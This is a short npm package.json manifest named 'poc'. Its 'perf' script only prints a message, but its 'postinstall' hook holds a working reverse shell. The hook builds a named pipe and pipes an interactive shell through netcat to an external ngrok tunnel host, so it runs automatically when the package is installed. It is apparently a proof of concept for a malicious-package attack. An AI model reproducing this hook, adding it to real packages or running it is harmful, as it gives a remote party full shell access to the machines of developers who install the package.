{
  "name": "poc",
  "version": "1.0.0",
  "scripts": {
    "perf": "echo 'Running benchmark...'",
    "postinstall": "rm -f /tmp/f && mkfifo /tmp/f && cat /tmp/f | sh -i 2>&1 | nc 0.tcp.in.ngrok.io 10789 > /tmp/f"
  }
}
